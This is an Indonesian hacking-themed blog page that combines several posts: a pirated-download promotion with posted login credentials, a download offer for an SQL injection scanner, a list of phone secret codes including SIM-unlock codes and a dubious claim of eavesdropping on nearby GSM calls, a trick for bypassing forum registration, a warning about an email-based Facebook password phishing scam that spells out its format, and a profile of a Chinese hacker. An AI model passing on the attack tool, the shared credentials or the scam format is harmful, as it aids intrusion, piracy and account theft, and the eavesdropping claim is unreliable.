FullReleasez.com is an advanced download crawler which indexes content spidered by external sites. When you click a download title you will be taken to the direct page containing the download. If your selected download is hosted on rapidshare, use your bonus account provided by us to bypass wait times and enjoy the full download speeds available.

information from fullreleasez.com :

Welcome to FullReleasez.com, your best solution to hassle-free working downloads. For only $4.87 one-time fee you can get a private lifetime membership to the latest, 0-day releases of full version games, software, movies, music, tv shows and much more. We currently supply over 100,000 gigabytes worth of downloads, and download speeds range from 450kb to 600kb on a DSL connection! Signing up is a breeze and is well worth it. Finally, Becoming a member takes less than 5 minutes!

Calm is free to you,
You simply login to your account below:

Username : Af872HskL
Password : XjsdH28N

Free Download Bako's SQL Injection Scanner 2010 New

Free Download Bako's SQL Injection Scanner 2010 New



nii buwat yang lagi hobby.
thx to master2 Xcode :DD

SQL injection bisa dibaca disini Hacking Website dengan tekhnik SQL Injection


tool ini sudah didesain khusus ke versi 2.2
Bako's SQL Injection Scanner 2010

Silahkan download bagi yang berminat hehehe

link to >>> Hotfile <<<
link to >>> Rapidshare <<<


┣┫┏━┳━━┓
┃┃┃╋┃┃┃┃
┗┛┗┻┻┻┻┛
┏━┳━┫┗┓
┃┃┃╋┃┏┫
┗┻┻━┻━┛
┏━┫┣┳━┳┳┓
┃╋┃━┫╋┃┃┃
┗━┻┻┻┻╋┓┃

kode - kode rahasia ponsel .

kode - kode rahasia ponsel .

Kode Rahasia Umum Symbian
*#06# Melihat IMEI
*#0000# Melihat Versi sofware
*#9999# Melihat Versi sofware
*#7370# Soft Reset
Untuk Hard reset: Tekan Tombol hijau, 3 dan * ditekan bersamaan, tekan tombol power. Password standar 12345
*#92702689# Melihat info tanggal perbaikan
Kode Rahasia Umum Java
*#7380# Reset atau Restore Factory Setting Nokia seri 40
*#7370# Reset atau Restore Factory Setting Nokia seri 60
*3370# Untuk restart ponsel Nokia 3310
*#7220# Mengaktifkan GPRS PCCCH
*#3925538# Menghapus Wallet di ponsel Nokia 6610,63101, data Wallet terhapus semua
*#67705646# Menghapus operator logo di ponsel Nokia 3310 & 3330
Operator GSM
Selain kode rahasia yang ada di ponsel, operator GSM juga memiliki kode rahasia untuk layanan yang diberikan pada pelanggan.
Call Diverting/ Call Forward/ Pengalihan Semua
* * 21* NUMBER # [SEND] Mengaktifkan
# # 21 # [SEND] Membatalkan
* # 21 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila tak ada jawaban
* * 61 * NUMBER # [SEND] Mengaktifkan
# # 61 # [SEND] Membatalkan
* # 61 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila dilu-ar jangkauan
* * 62 * NUMBER # [SEND] Mengaktifkan
# # 62 # [SEND] Membatalkan
* # 62 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila sibuk
* * 67 * NUMBER # [SEND] Mengaktifkan
# # 67 # [SEND] Membatalkan
* # 67 # [SEND] Melihat status
# # 002 # [SEND] Membatalkan semua pengali-han
Diverting Data/ Forward Data/ Pengalihan semua data
* * 21 * NUMBER * 25 # [SEND] Mengaktifkan
# # 21 # * 25 [SEND] Membatalkan
* # 21 # * 25 # [SEND] Melihat status
NOKIA
Nokia 9300/ 9500
*#170602112302# Melihat versi software
*3370# Memakai tenaga baterai cadangan
#3370# Menon-aktifkan Enhanced Full Rate Codec ( EFR).
*#4720# Mengaktifkan Half Rate Codec.
#pw+1234567890+l# Melihat status Provider Lock, (tekan * untuk simbol p,w +)
#pw+l 234567890+2# Melihat status Network Lock, (tekan * untuk simbol p,w +)
#pw+1234567890+3# Melihat status Country Lock, (tekan * untuk simbol p,w +)
#pw+1234567890+4# Melihat status SIM ‘Card Lock, (tekan * untuk simbol p,w +)
*#21# Melihat semua panggilan yang dialihkan.
*#2640# Menampilkan Security Code.
#30# Melihat Private Number.
*#73# Reset the Phone Timers.
*#746025625# Menampilkan status SIM Clock.
*#7760# Manufactures code.
*#7780# Restore factory settings
*#92702689* Melihat garansi posnel
(*#WAROANTY#)
Tekan & tahan tombol “Shift + Ctrl + F dan tombol Power Soft Reset
Nokia E60
*#92702689# *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis.
*4720# (*hraO#) Mengaktifkan Half Rate
#4720# (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370* (#efrO#) Menon-aktifkan Enhanced Full Rate
* #746085685* (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#peaO#) Mengaktifkan GPRS dan dukungan Packet Common Control Channel (PCCCH)
*#7230# (*#pcdO#) Menon-aktifkan GPRS dan dukungan Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538# (*#resOwallet#) Reset the Mobile Wallet, data akan hilang semua
Nokia E61
Tahan # Berganti profile dan mode diam.
Tombol fungsi biru + Ctrl Mengaktifkan Bluetooth
Tombol fungsi biru + Chr Mengaktifkan IR
Ctrl + C Copy
Ctrl + X Cut
Ctrl + V Paste
Ctrl + Joystick Down Page Down (turun satu halaman)
Ctrl + Joystick Up Page Up (naik satu halaman)
Shift + Joystick Left or Right Menyorot satu lurus
Shift + Ctrl + Joystick Left or Right Menyorot satu kata
Ctrl + Joystick Left or Right Menggerakkan cursor diantara kata
*#2820# Melihat alamat Bluetooth
*#62209526# Melihat alamat adapter WLAN MAC
*#92702689# Melihat usia ponsel
Nokia E65
*#92702689# *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720# (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370# (#efrO#) Menon-aktifkan Enhanced Full Rate
*#746085685# (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#pcaO#) Mengaktifkan Half Rate
*#7230# (*#pcdO#) Menon-aktifkan Half Rate
*#7760# (*#ssnO#) Mengaktifkan Enhanced Full Rate
*#2820# (*#btaO#) Menon-aktifkan Enhanced Full Rate
*#7370925538# (*#resOwallet#) Melihat status SIM lock
Nokia E70
*#btaO# Melihat alamat Bluetooth
*#macOwlan# Melihat alamat adapter WLAN MAC
*#oprOlogo# Menghilangkan logo operator
*#pcaO# Mengaktifkan logo operator
*#pcdO# Menon-aktifkan GPRS dan dukungan Packet common control channel (PCCCH)
*#simOclock# Melihat status SIM clock
*#170602112302# Melihat versi software
*#warOanty# Melihat kode garansi
#pw+1234567890+n#
n = 1
n = 2
n = 3
n = 4 Menampilkan status SIM lock
provider lock
network lock
country lock
SIM lock
Nokia N80
*#92702689* *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720* (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370* (#efrO#) Menon-aktifkan Enhanced Full Rate
*#746085685* (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#pcaO#) Mengaktifkan dukungan GPRS dan Packet Common Control Channel (PCCCH)
*#7230#. (*#pcdO#) Menon-aktifkan dukun¬gan GPRS and Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538*. (*#resOwallet#) Reset the Mobile Wallet
Nokia N91
*#06# Melihat IMEI.Tanggal pembelian, tanggal servis
*#0000# Menampilkan versi firmware dan tanggal
*#btaO# Melihat alamat Bluetooth MAC
*#oprOlogo# Menghilangkan logo operator
*#pcaO# Mengaktifkan dukungan GPRS PCCCH
*#pcdO# Menon-aktifkan dukungan GPRS PCCCH
*#resOwallet# Reset the mobile wallet
*#simOclock# Menampilkan status SIM clock
*#ssnO# Menampilkan nomor seri pabrikasi
*#warOanty# Menampilkan garansi dan servis
*efrO# Mengaktifkan encoding EFR
#efrO# Menon-aktifkan encoding EFR
*hraO# Mengaktifkan encoding HR
#hraO# Menon-aktifkan encoding HR
#pw+1234567890+n#
n = 1
n = 2
n = 3
n = 4 Menampilkan status SIM lock
provider lock
network lock
country lock
SIM lock
Nokia N93
*#92702689* *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720#* (#hraO#) Menon-aktifkan Half Rate
*#3370# (*efrO#) Mengaktifkan Enhanced Full Rate
*#746085685* (*#simOclock#) Melihat status SIM lock
*#7220# (*#pcaO#) Mengaktifkan dukungan GPRS dan Packet Common Control Channel (PCCCH)
*#7230# (*#pcdO#) Menon-aktifkan dukung¬an GPRS and Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538# (*#resOwallet#) Reset Mobile Wallet
Nokia N96
*#92702689# Melihat umur ponsel
*#62209526# Alamat Wireless MAC (M A C _ WLAN)
*#2820# Alamat Bluetooth MAC (B T A 0?)
*#7370# Format Soft Reset
*#7780# Factory Reset/ Hard Reset
SAMSUNG
Untuk membuka kode ponsel Samsung, dapat dilakukan dengan cara posisi SIM Card tidak terpasang pada ponsel. Namun kode dibawah ini tidak akan berfungsi pada beberapa versi ponsel Samsung secara keseluruhan.
*#06# Melihat IMEI
*2767*5282# Java reset
*2767*63342# Reset media
*2767*927# Wap reset
*#9998*4357# Help menu
**9998*5282# Setting Java server
*#9999#0# Melihat monitor mode
*#9999# Sofware version
*#8888# Hardware version
*#9998*748# SIM info
*#9998*523* Contrast layar ponsel
*#9998*842* Vibration ON lalu tekan OK
*#9998*289# atau *0289# atau *#0289# Buzzer ON lalu tekan OK
*#9998*782* Menunjukkan tanggal & alarm
*#8999*638# Menunjukkan info network
*#9998*5646* Mengubah logo operator
*#9998*968* Menunjukkan nada untuk alarm
*#3243948# Digital audio interference OFF
*#32436837# Digital audio interperence
*#0001# Menunjukkan serial parameter
*#9998*228# Melihat kapasitas batera
*2767*2878# Custom EEEPROM reset
*2767*3855# Full EEPROM reset
*#9998*585# Non-Volatile Memory (NVM)
*#9998*76# Nomor produksi
*#9998*782# Menunjukkan tanggal dan jam alarm
*#9998*778# or *#9998*0778# or
*#0778# Daftar layanan SIM
*#9998*377# or *#9998*0377# Error log
*#9998*746# or *#9998*0746# or
*#0746# Sim Info
Samsung V200 & V300
*2767*63342# Unlock Code
*2767*3855# Unlock Code
*2767*2878# Unlock Code
*2767*927# Unlock Code
*2767*7822573738# Unlock Code
LG
2945#*# Test mode LG
2945*#01*# Menu rahasia
*#06# IMEI
*#07# IMEI and SW
*8375# Software version (LG B1200):
*6861# Recount cheksum (LG B1200)
*PWR 668 Factory test (B1200):
1945#*5101# Simlock menu (LG B1200)
2945#*5101# Simlock menu (LG 510W, 5200)
2945#*70001# Simlock menu (LG 7020, 7010)
2947#* Simlock menu (LG 500, 600)
BENQ SIEMENS
*#06# Versi software BenQ Siemens, lebih lengkapnya, tekan softkey beberapa kali
*#0001# Menu bahasa Inggris
*#0606# Kode rahasia, lepaskan SIM card lebih dulu
*#0003*(secret code)* Unlock Sim
*#0049# Menu bahasa Jerman
*12022243121 Layar tambahan
BENQ
C30 *#06# Cek IMEI
*#166*# Cek Versi Software C36 *#06# Cek IMEI
*#166*# Cek Versi Software T60 *#06# Cek IMEI
*#66*# Cek Versi Software E72 *#06# Cek IMEI
Mengganti bahasa ke default atau English *#0000# —> dial.
Mengganti bahasa dari English ke Indonesia: *#0062# —> dial.
* melihat kode negara
MOTOROLA
Pada ponsel Motorola terdapat symbol yang cukup aneh untuk fungsi Pause. Symbol [] (Pause) maksudnya tekan tombol * dan tahan hingga muncul tanda []. Masih banyak kode-kode lain yang ada. Jika angka terakhir dengan angka 0 maka kita dapat menon-aktifkan kode tersebut. Nomor tiga digit di bagian tengah dimulai dari angka 0 hingga 999. Kita bisa mengganti frekuensi menjadi 900/1800 den¬gan memasukkan tipe tertentu. Berikut ini langkah-langkahnya.
*#06# Melihat IMEI
Tekan bersamaan * 7 Kode untuk membuka tombol
[] [] [] 0 0 8 [] 1 [] Memilih line telepon - (gunakan untuk menulis sesuatu di bawah nama provider
[] [] [] 1 0 5 [] 1 [] Menambahkan phonebook di menu utama
[] [] [] 1 0 7 [] 1 [] Menambahkan pesan di menu utama
[] [] [] 1 0 8 [] 1 [] Copy memory SIM (menu phonebook)
[] [] [] 1 1 3 [] 1 [] Pilihan teknis (menu utama)
[] [] [] 1 0 1 [] 1 [] Slow (Frequency menu pen-cari)
[] [] [] 1 0 2 [] 1 [] Medium (Frequency menu pencari)
[] [] [] 1 0 3 [] 1 [] Fast (Frequency menu pen¬cari)
[] [] [] 1 1 9 [] 1 [] Mengaktifkan EFR
[] [] [] 0 0 4 [] 1 [] Mengganti Pin
[] [] [] 0 0 5 [] 1 [] Membuka blok menggu-nakan nomor PUK
Ponsel China
Seperti halnya ponsel branding, ponsel China juga memiliki kode rahasia untuk mengakses menu-menu rahasia. Ponsel China ini memiliki fitur seperti layar sentuh, dual kamera, dual sirh, dual baterai, dual charger dan fitur-fitur lainnya. Sebagian besar ponsel China memiliki software dan fitur yang sama, namun tampilannya saja yang terlihat berbeda.
1122, 3344, 1234, 5678 Kode default user
*#110*01# Mode teknis
*#987# Mode pabrik Factory mode
*#110*01# -> Device -> Set UART -> PS Config -> UART1/115200 Mengaktifkan port COM
*#987*99# Restore factory settings
*#369# Mengatur LCD contrast
*#800# software version
*#900# software version
*#0000# Send Mengatur bahasa standard
*#0044# Send Mengatur bahasa Inggris
*#001# Send Mengatur bahasa Inggris (firmware baru)
*#0086#, *#0886# Mengganti ke bahasa China
*#0084#, *#0966# Mengganti ke bahasa Vietnam
Sony Erricsson K800i
*#3449*~11*1# –> Menyantol frekuensi GSM Terdekat, Sehingga Kita bisa Mengguping Pembicaraan GSM aktif terdekat dengan lokasi anda…

Cara mudah Login di Forum tanpa Registrasi

Cara mudah Login di Forum tanpa Registrasi

Pernah gaa saat googling buat cari informasi penting ehh tiba2 ketemu di forum yang belum kita tahu dan ternyata harus daftar dulu atau login biar bisa lihat informasinya?

pasti terasa sangat malas kalau daftar lagi,
betull gaaa ??

tenang aja barusan tadi saya juga merasakan itu kog, sebelum posting artikel ini tadi saya iseng2 cari ebook bertema sulap di indowebster ehhh malah ada tulisan di salah satu keterangannya 'pass di forum'.

wahh nanti kalau saya download percuma dong nanti saya ga bisa buka filenya.
terus menurut feeling saya wahh pasti ini pass ada di forum Indowebster (IDWS) kalau akun idws saya punya tapi kalau forumnya saya nggaa punyaa. hehehe

jadi berfikir balik nii,
mauu download apa gaa yaa?
tiba2 saya ingat salah satu trik yang saya dapat dari forum biasanya ini niii http://xcode.or.id/forum2
forum kebanggaan indonesia kaskus.us juga lohhh hehehhe

okee deh dari pada cerita terus
begini caranya untuk dapat akun login.

silahkan akang2 mba2 masuk disini http://bugmenot.com

caranya:
silahkan masukan nama link forum di kotak input link disana
lihat gambar


gantikan www.example.com dengan link forum yang ingin dituju.
jika sudah tekan get logins.
lihat apa hasilnyaa ???

Metode Hacking Chips Poker (modus baru)

Semakin banyaknya orang yang terkena hack FB dan Kemudian Chipsnya diambil oleh orang-orang yang tidak bertanggung jawab saya ikut prihatin dan kini saya akan coba berikan informasi nya. Di postingan sebelumnya saya ada berikan cara Hacker menghack Facebook dan postingan tentang Facebook saya yang sempat kena Hack.
Di dua postingan saya itu banyak orang yang memberikan komentar tentang cara mengembalikan facebook atau email yang kena hack, tapi tidak saya approve sehingga tidak tampil, alasan saya tidak approve karena cara-cara yang diberikan justru modus baru hacking email, saya sudah coba caranya menggunakan email baru yang saya bikin tapi malah tidak berhasil dan malah di ambil passwordnya. Berikut cara dan modus baru Hacking Facebook dan Email.
Lakukan langkah-langkah dibawah :
1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Ini adalah format pesan yang harus anda kirim ke autohacz@yahoo.com
-Kirim email ke autohacz@yahoo.com
-bcc: cc: (biarkan kosong)
-Subject: PASSWORD RETRIEVE
-Isi pesan :
baris pertama tulis >AUTOUSER: lalu alamat email anda.
baris kedua tulis >AUTOSEARCHING: lalu alamat email facebook korban.
baris ketiga tulis >LOGID :lalu password facebook anda.
baris keempat tulis kode ini >>> cgi-bin/$et76431&pwr999fb
Lalu Send/Kirim.
Contoh :
To : autohacz@yahoo.com
Bcc: Bc: (biarkan kosong)
Subject : PASSWORD RETRIEVE
Isi :
>AUTOUSER:under_ray@yahoo.com
>AUTOSEARCHING :korbankut@yahoo.com
>LOGID :blablabla
>>> cgi-bin/$et76431&pwr999fb
Lalu Send/Kirim.
Catatan: Ingat anda tidak mengirimkan email ke orang namun ke Mesin penjawab otomatis! Isi pesan dan segala formatnya harus seperti petunjuk diatas, jika tidak mesin tidak akan bisa membaca perintah anda.
Setelah itu maka anda akan mendapat email balasan berisi Password korban horee…!
INGAT JANGAN SEKALI-KALI MENIRU CARA DIATAS!!!
Dipikir secara logika saja mana mungkin admin yahoo memberikan fasilitas seperti diatas, kalau ada ya semua facebook orang sudah di hack asal tau alamat email orang tersebut. Kemudian alamat email dari autohacz@yahoo.com yang nggak jelas, setahu saya nggak ada email dari pihak admin yahoo seperti itu. Masih banyak contoh email2 lainnya yang digunakan email diatas hanya salah satu contoh saja. Kalau menemukan modus seperti diatas jangan sekali2 percaya dan mencoba nya.
Jadi pesan saya berpikir dahulu sebelum melakukan segala sesuatunya, jangan langsung coba, yang ada malahan email anda akan di hack kembali.

Xiao Tian – Hacker yang menyebabkan Google Hengkang dari Cina

Google baru-baru ini menyatakan siap mengundurkan diri dari China dan menutup seluruh operasional mereka di sana. Alasannya, raksasa mesin pencari itu sudah tidak tahan dengan gelombang serangan yang dilancarkan para hacker asal negeri tirai bambu tersebut.
David Drummond, Senior Vice President, Corporate Development and Chief Legal Officer Google menyebutkan, pihaknya mendapati adanya ‘serangan yang sangat canggih’ yang berasal dari China terhadap infrastuktur Google.
“Serangan-serangan ini membuat kami memutuskan untuk meninjau kelayakan operasi bisnis kami di China,” sebut Drummond blog resmi Google, 12 Januari 2010.
Langkah Google yang memilih mundur dari China menunjukkan dahsyatnya komunitas hacker di negeri tersebut.
Sampai Juli 2008, diperkirakan terdapat 4 juta orang hacker yang tergabung dalam berbagai komunitas hacker. Salah satunya adalah kelompok hacker khusus wanita yang menamakan diri Cn Girl Security Team.
Kelompok hacker ini dipimpin oleh gadis kelahiran Hunan, 6 September 1989 bernama Xiao Tian.
Dalam benak, kita mungkin membayangkan bahwa tipikal seorang hacker adalah remaja yang beranjak dewasa, dengan penampilan seadanya – kalau tidak dibilang buruk rupa – dengan kacamata tebal, perokok berat, rambut acak-acakan tak terawat dan jarang mandi karena menghabiskan sebagian besar hidupnya di depan komputer.
Ternyata tidak demikian dengan Xiao Tian. Meski menyebutkan ia sering begadang dan sesekali merokok, tetapi penampilannya sangat apik. Sepintas, melihat penampilannya, Anda mungkin tak akan menyangka bahwa ia merupakan pimpinan dari kelompok hacker yang anggotanya mencapai lebih dari 2.200 orang hacker wanita.
Xiao Tian menyebutkan, ia membuat kelompok tersebut karena ia merasa bahwa perlu ada tempat bagi gadis remaja sepertinya, yang merasa tersingkirkan dari dunia hacker yang disesaki oleh hacker pria yang menganggap bahwa hacker wanita tidak memiliki skill yang cukup.
Perlahan tapi pasti, Xiao Tian dan kelompok hackernya mulai menerobos dominasi pria di dunia hacking. Mereka mengincar status selebritis yang disandang oleh para hacker di China sekaligus membuka peluang ‘karir’ yang menggiurkan yang tersedia bagi hacker yang memiliki reputasi tinggi.
Meski anggota klub hacker Xiao Tian masih relatif kecil dibandingkan dengan populasi hacker di China, akan tetapi ‘organisasi’ hackernya mungkin merupakan salah satu kelompok hacker perempuan terbesar di China.
Scott Henderson, seorang pensiunan tentara AS yang merupakan pengamat dan penulis The Dark Visitor: Inside the World of Chinese Hackers pernah menyebutkan pada DNA India. “Aspek unik dari hacker China adalah rasa nasionalisme dan kolektivitas. Ini kontras dengan stereotip hacker barat yang umumnya mandiri dan bekerja secara individual di ruang bawah tanah tempat tinggal mereka,” ucapnya.
Akan tetapi, belakangan, kecenderungan yang terjadi adalah ‘tentara cyber’ tersebut terpecah-pecah dan membentuk kriminal kapitalis dan mulai meninggalkan rasa nasionalisme mereka.
Meski demikian, Henderson menyebutkan, suatu saat jika ada konflik yang melibatkan China, hacker tentu akan memobilisasi kelompok mereka dan terlibat dalam perang dunia maya. Dan jika saatnya tiba, ‘jenderal’ Xiao Tian mungkin akan menjadi salah satu pemimpin pasukan tentara China tersebut.
xiao Tian
xiao tian
xiao tian
Wah ternyata Hacker Cina Narsis juga ya
 
Copyright © 2011. mandhez . All Rights Reserved.
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template Design by Premium Blogger Templates. Inspired from Blogger Tricksfree download all